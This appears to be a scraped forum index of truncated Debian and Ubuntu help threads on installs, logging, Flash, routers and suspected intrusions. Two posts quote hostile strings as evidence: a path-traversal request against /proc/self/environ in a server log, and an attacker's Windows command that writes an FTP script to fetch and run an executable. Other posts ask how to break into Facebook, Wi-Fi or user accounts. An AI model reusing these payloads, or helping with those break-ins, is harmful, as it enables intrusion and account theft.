Debian :: PHP Hack Attempt Logs?
Apr 13, 2011
I have received the following log messages on my Debian Squeeze webserver:Apr 13 15:16:37 vps suhosin[4699]: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'controller' (attacker '75.126.235.115', file '/var/www/xxxxxxxxxxxxx.com
75.126.235.115 - - [13/Apr/2011:15:16:37 +0100] "GET /index.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8018 "-" "libwww-perl/6.01"
[code]....
View 1 Replies
ADVERTISEMENT
Aug 2, 2010
Running Ubuntu 10.04 I noticed my hard disc rumbling for longer than normal and louder. Not doing anything demanding to cause hard disk activity like this so I was suspicious so I checked my process list with 'top' command in the console terminal. At the top was mount.ntfs running. Eventually it stopped running after 20 seconds or so. At the time I have not been accessing NTFS filesystems, but I do have them. I have a dual boot Ubuntu 10.04 and Windows 7. In Ubuntu I've mounted the Windows main C drive and on the same hard disk a partitioned drive for sharing files between the OSs. I know mount.ntfs is a standard program but was it being run on my machine, instigated externally here? Was the running of mount.ntfs an attempt from outside to hack into Ubuntu and the mounted Windows areas of my machine via a backdoor connection or vulnerability? I've restarted my machine since then. Are there any logs I can check for malicious attempts to break in?
View 9 Replies
View Related
Aug 27, 2010
I finally found a blank DVD), I, of course, have a few questions: 1. Besides costs, what are some benefits of Linux over Windows? I'm sure with some use, I'll figure some of them out myself; my main problem with Windows (err, Microsoft) is their attempt to monopolize computers. If you have Windows, you have to deal with Microsoft's attempt to keep your computer free of all non-Microsoft products. 2. How do I resize the desktop? When I start up Debian I get an 'Out of Range' message on my screen, then after I hit CTRL Alt + a few times, I'm left with an oversized GUI- it's bigger than my monitor so I have to bring the mouse to the side/bottom to scroll down to my taskbar. 3. How do I install programs? The first thing I tried installing was Google Chrome, but I get an error message "Archive not found."
View 5 Replies
View Related
Jan 16, 2011
I learned that, even while on Linux, using Iceweasel/Firefox 3.0.6 is not safe. So I tried to update the browser for my PPC G4 iMac (256 MB RAM, 800 MHz processor).
1. I downloaded a backported Iceweasel .deb from URL...
2. I then tried to install it with dpkg -i PathToIceweasel.deb
3. There was an error. I remember seeing xulrunner-1.9.1 is not installed. I tried to install that with apt-get but it was not available.
4. Now when I click on web browser I get the error "Failed to execute default Web Browser: Input/Output error".
5. What can I do without having to reinstall?
View 11 Replies
View Related
Jan 31, 2016
I am attempting to install debian for the first time on my pc that has no cdrom drive. I downloaded the Jessie CD image and wrote it to a 4GB stick, it didnt work. Then tried the netinstall image but face the same issue.
To write the usb stick I used unetbooting first, then tried win32diskimager and finally tried DD while stick was not mounted
Code: Select alldd if=debian.iso of=/dev/sdb BS=4MB; sync
Issue is still the same: I boot from the usb and after selecting language and keyboard it fails to detect cdrom drive (no drive at all in my pc). Same behavior using normal or expert mode.
Im also unable to manually specify the drive (it looks at /cdrom and I wanted to change it to the usb stick itself or mount usb to /cdrom but I cant find my stick in /dev)
View 14 Replies
View Related
Mar 29, 2011
I have problem with loging, actually iptables logs a data but it seems that for some reasons does not writes in a log file:
Code:
iptables -L -v
Chain INPUT (policy ACCEPT 406 packets, 124K bytes)
pkts bytes target prot opt in out source destination
0 0 ACCEPT tcp -- any any xxxxxxxxxxx anywhere tcp dpt:xxxx
[Code]....
i checked /var/log/message and /var/log/syslog nothing is here related to iptables. then i create separate file for Iptables by adding this: kern.warning /var/log/iptables.log in my rsyslog.conf it does create iptables.log file inside /var/ but its still empty
View 4 Replies
View Related
Oct 9, 2010
How to hack a facebook account? I need, because someone break into my Facebook and i need to get my password back<~
View 7 Replies
View Related
Nov 28, 2010
Any 1 who uses Linux knows that one problem with many distros (if not all) can't play flash videos fullscreen and change volume at the same time. Very very very very annoying.
But I think I might have come across a fix possibly probably not but who knows!!!
Here is the story. I was on my windows partition playing some games, but i also wanted to watch hulu on my second screen. To my amazement flash would exit full screen (on second screen) when it became out of focus because of a click on my main screen. so i did a search on the web and they have a flash hack that keeps it from exiting when it loses main focus. This is what we need!! can some1 with slightly more hacking know-how then me make this hack work for us over on linux?
here is the link
http://bramp.net/blog/full-screen-hack-for-flash
View 3 Replies
View Related
Feb 12, 2011
Last week some bad news hitted us, my uncle deceased at the age of 39, to young and very unexpected. We enherited his computer, but theres a password on his account. Googling didnt really worked for me.. I have totally 0 experience on linux systems. Is there a way to 'hack' his account and get access to his files, fotos and other stuff that is precious to us?
View 12 Replies
View Related
Jun 21, 2010
I am currently running a old school hacked Linksys WRT54G and have played around with some of the hacks and currently running Tomato on it and I am pretty happy (tho the lack of OpenVPN Server suck) but I need an upgrade to something with 802.11N and I bet I am not the only one. The options right now are
Grab a hackable consumer 802.11 Dual Band-N router and throw on it DD-WRT, OpenWRT or Tomato again Build my own using old hardware (dont really want to, feel they eat too much power for a simple task) Build/Buy hardware for a custom router (Atom system, or I recall back in the day some people use to sell small ATX-like boards just for embedded linux to run as a router) So what option would you go with and why? And if the DIY route should I try to get some hardware that is pre made for the job or DYI like a Atom machine.
View 2 Replies
View Related
May 25, 2010
Recently I had a problem with my gf.. now ex.. she put a pssword on the network.. and now I cannot get in.. anyway to hack it? I just want to be able to connect online while at home..
View 8 Replies
View Related
Oct 31, 2010
I'm using 10.04 with Gnome and I've just discovered that Kaffeine works with my TV card provided I use the modprobe hack. So I created /bin/dtvfix with the following:
Code:
#!/bin/bash
/sbin/modprobe -vr dvb_bt8xx
[code]....
View 9 Replies
View Related
Jul 27, 2010
I just got a USB bluetooth adapter for my Laptop. I'm running Lenny with all the lateset updates, on and Ispiron 8600. I went through and made sure I installed all the Bluez stuff (as far as I can tell anyway). I'm trying to use it with my Droid Eris and while I have been able to successfully recieve files from the phone in Linux, I noticed it seems a little buggy and I think it ma have something to do with the logs. Below is a sample. As you can see, one line keeps repeating continuously. Given enough time, it will fill the entire /var partition. When I remove the Blutooth, it stops.
Code:
hal9000:/var/log# tail -F syslog
Jul 27 03:59:00 hal9000 hcid[32187]: Stopping security manager 0
Jul 27 03:59:00 hal9000 hcid[32187]: Device hci0 has been disabled
Jul 27 03:59:00 hal9000 NetworkManager: <debug> [1280217540.460076] nm_hal_device_removed(): Device removed (hal udi is '/org/freedesktop/Hal/devices/usb_device_a12_1_noserial_if0_bluetooth_hci_158315a310').
[Code]....
View 3 Replies
View Related
Jul 29, 2010
I'm trying to find out where the logs from slapd.conf (loglevel -1) go? I know in RH is /var/log/ldap.log cant find it on Debian. Its probably too late
Btw. does Debian have something like /etc/syslog.conf. If yes where?
View 1 Replies
View Related
Jun 3, 2011
Is there a similiar flash hack for the adobe flash player in linux, that when u choose fullscreen at a video, just like ....., that it isn't closed when you are clicking on the other Monitor, because it's really annoying. Sry I posted this once, but I got banned by "accident" ( Don't ask me how that can happen ), and I could not find the post anymore...
In this link it is described for windows: FlashHacker Keeps Flash Videos in Full Screen on Your Dual Monitors
View 6 Replies
View Related
Jan 11, 2010
I am currently taking my CCNA course. I have come to realize that to be a great Admin and secure a companies data, you first have to know it's weakness. Now I have become aware of a few programs like John the ripper telnet password crack, nmap, and the like. Well I have used nmap to port scan my own website for practice. I received some good intel on what ports are open and vulnerable. I am now trying to figure out how to hack in.To get my website info I used :
[Code]...
View 12 Replies
View Related
Jul 27, 2010
So 1 year ago I installed Lenny, but in the process of installation during the splitting of the drive I have mistakenly set a seperate parition for "/var/logs" instead of "/var/log". Is there any way to redirect all the logs to this seperate partition (var/logs) or it's better to go through the whole trouble* of installing Lenny again? *the trouble because it was hell of a problem to fix grub that didn't recognize SmartArray RAID (cciss driver), the problem is that I don't really remember how I fixed it. Symbolic link won't help since physically it will still be on the other partition. Do I have any other option?
View 3 Replies
View Related
Jul 23, 2011
Well it turns out my system has logged out more then once on its own. I had the system updated and upgraded from 7-3-11 and it did this about once a week. On 7-18-11 I did a full update and upgrade and it logged out a few times in a couple of hours. It does it while I am away and the system is in screen saver mode. I used my partition clone and restored the system back to 7-3-11. Has any one else ever had such an issue?
View 2 Replies
View Related
Oct 6, 2009
I used to know a command to turn off various logs that run in the background of Debian. I using lenny on CF on an embedded board, that why I need the logs off, to stop writes.
View 1 Replies
View Related
Apr 19, 2010
When I try to login as me - it gets pretty far but then something happens and automatically logs out. This happens in Gnome, Kde too. Now - I have no problem logging in a Root. Is there a way I can try to stop the login process before it kicks me out, or is there a way to look at some files to tell me what's going on?
View 3 Replies
View Related
Jan 13, 2010
There is this slackbuild in which I have changed the part in bold.
Code:
#!/bin/sh
# Packager GioPower, luca.gio.85~at~gmail~dot~com
# VTK (Visualization Toolkit)
#
# The Visualization Toolkit (VTK) is an open-source, freely available
[Code]...
This will still drop stuff into /usr/lib, which is clearly anti Slackware64... I do not know enough of cmake builds, which flag do I have to pass in the slackbuild for cmake to drop stuff in /usr/lib64...?
View 2 Replies
View Related
May 1, 2014
For some time now I've been unable to see changelogs for packages to be upgraded in Wheezy,even trying with different mirrors in sources.list all I'm getting is this:
Code: Select allaptitude changelog iceweasel
Err Changelog of iceweasel
E: Changelog download failed: 404 Not Found [IP: 185.31.16.185 80]
Err Changelog of iceweasel
E: Changelog download failed: 404 Not Found [IP: 185.31.16.185 80]
E: Couldn't find a changelog for iceweasel
[Code] ....
Is there maybe some specific reasons why I can't get changelogs before applying the updates? I know I can review them afterwards,it's just that I would find convenient to have a look before updating.
View 14 Replies
View Related
Mar 21, 2015
I want to install Debian but I'd like to keep my Skype chat history.
I don't know if it's possible to just copy from %appdata% the skype folder and put it into the Debian's one.
How could I do? I read one post but it's quite old, so maybe there's something new now.
View 2 Replies
View Related
Dec 1, 2015
How to enable persistent logging with systemd? I find it really weird that all this machinery that is systemd doesn't store persistent logs, what if I'm trying to retrieve some information regarding previous boots?
For instance: I have random suspend issues, after rebooting the computer there's no trace left in the logs of what happened, and furthermore (at least in Jessie) I can no longer see a pm-suspend log.
So, at first it sounds like all you have to do is edit journald.conf setting #Storage=auto to "persistent" and create the /var/log/journal directory, but then reading here /usr/share/doc/systemd/README.Debian
Code: Select allEnabling persistent logging in journald
=======================================
To enable persistent logging, create /var/log/journal and set up proper permissions:
install -d -g systemd-journal /var/log/journal
setfacl -R -nm g:adm:rx,d:g:adm:rx /var/log/journal
and here [URL] ....
There are two main reasons why I decided to not enable persistent logging just yet ....
We did get corrupt journal files in the past where the journal then no longer worked at all [1]. With volatile you can just reboot and have a clean state again. Admittedly, the journal has seen a lot of improvements in the mean time and hopefully is more robust, so this point is no longer true.
We still install rsyslog by default. That means we get store them twice. This is something we don't want to do atm.
View 3 Replies
View Related
Mar 10, 2011
In a squeeze box, I installed awstats and it's working like a charm. Its cron job update the awstats database every 10 minutes (as it runs as root). But I would like to be able to update the statistics from the browser as well. So I setup everything as required and I gave "read" access to "others" to every apache log file. Now, a couple of questions came to my mind:
1. Am I compromising server's security giving "read" access to "others" to apache log files?
2. Instead of giving "read" access to "others", I could add www-data user to adm group (as apache log files are owned by root:adm and permissions are rw-r----). Is this more secure than giving "read" access to "others"? 3. If the option would be giving "read" access to "others" at the end, a log file would be owned by root:adm and its permissions be rw-r--r--. As apache rotates its log files, when Apache create a new log file, does it preserve the permissions (rw-r--r--) or create it with the default permissions (rw-r-----)?
View 1 Replies
View Related
Mar 20, 2011
When i open some video on the net, the system logs out (especially when i open ..... video). I suspect its flash (current version is 10.02). Is there any way how to fix this? Or how to downgrade to minor version.
Another thing as well. By default i have GNOME version. Just installed the KDE full package from synpatic. when i try to log in with kde manager same like the flash, it logs me out to welcome screen.
View 1 Replies
View Related
Mar 30, 2010
I noticed i have quite a few logs that end with .[number] for example "syslog.1" "mail.info.1" etc, why is this and why are they there since almost nothing is logged in them ??
Question 2: on my server im running a script like imagebam and imageshack with hosts images so i have quite a few apache requests to my server. I am wonder why apache takes up so much CPU for some of the requests? in Htop some requests take up 1.2% CPU while other take up 3-5% etc, so the total load is about 1.50 0.58 0.84 to 2.61 1.08 1.14 with about 128-150 apache requests all the time while sometimes the CPU load can be almost 0 with the same ammount of requests. is this normal? what could cause this in apache ?? the server is just running apache2. MYSQL is running on another server.
View 1 Replies
View Related
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
May 7, 2011
i get file system errors on boot up. found logs in /var/logs but cant access them. second best thing i can do is to re-install debian but no one seems to want to say how thats done. my disk wont run in wine (some error i dont remember) so i cant use my CD /flashdrive to re-install.
1) i need to read the log files and try to fix the install
2) if i cant fix i need to know how to wipe the OS and do a fresh install
View 2 Replies
View Related
Jun 22, 2015
So the question is simple what I need is to run file.sh after user logs into desktop LXDE.
Ive been trying whole day tried to put my file.sh into /etc/init.d and ever created symbolic link to /etc/rc4.d etc..
BUT after I log into desktop nothing happens?
I am coming from ubntu there it was easy just add that script into startup applications.
View 14 Replies
View Related
